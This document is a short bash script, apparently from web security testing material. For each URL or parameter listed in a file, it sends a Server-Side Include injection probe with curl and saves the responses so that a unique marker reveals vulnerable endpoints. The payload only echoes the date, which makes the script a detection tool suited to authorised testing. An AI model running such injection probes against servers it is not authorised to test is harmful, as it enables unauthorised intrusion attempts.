#!/bin/bash

CURL=/usr/bin/curl

# Where do we put the responses received from the server?
OUTPUTDIR=/tmp

# A file with URLs to attack, one per line
#   For a GET request, line should be http://:/?=
#   For a POST request, line should be http://:/ 
URLFILE=urls.txt

# If SSI Injection succeeds, a 'grep' for this string will help find it
UNIQUE_SSI_ID=XYZZY_SSI_INJECT_%Y

typeset -i COUNTER
COUNTER=1

while read LINE
do
     # Get the URL and PARAMETER for POST Requests
     URL=${LINE% *}
     PARAMETER=${LINE#* }

     OUTFILE="${OUTPUTDIR}/curl${COUNTER}.html"
     COUNTER=${COUNTER}+1

     # Safely encode the LINE such that we can SSI-Inject it
     # This will help us find the URL that is vulnerable
     LINE_ENCODED=`echo ${LINE} | perl -MURI::Escape -lne 'print uri_escape($_)'`

     # The SSI Injection payload is:
     # 
     # 
     INJECTION_STRING="%3C!--%23config%20timefmt=%22${UNIQUE_SSI_ID}(${LINE_ENCODED})%22%20--%3E"
     INJECTION_STRING="${INJECTION_STRING}%3C!--%23echo%20var=%22DATE_LOCAL%22%20--%3E"

     if [ "${URL}" != "${LINE}" ]; then
          # If the LINE read from the URLFILE contains a space, we will get here.
          # According to our URLFILE format, this indicates a POST request.
          curl -f -s -o "${OUTFILE}" -F "${PARAMETER}=${INJECTION_STRING}" ${URL}
     else
          # If the LINE read from the URLFILE does not contain a space, we will get here.
          # According to our URLFILE format, this indicates a GET request.
          curl -f -s -o "${OUTFILE}" "${URL}${INJECTION_STRING}"
     fi

     RETCODE=$?

     # check to see if curl failed or the server failed
     if [ $RETCODE != 0 ]
     then
          echo "FAIL: (curl ${RETCODE}) ${LINE}"
     else
          echo "PASS: (curl ${RETCODE}) ${LINE}"
     fi
done < ${URLFILE}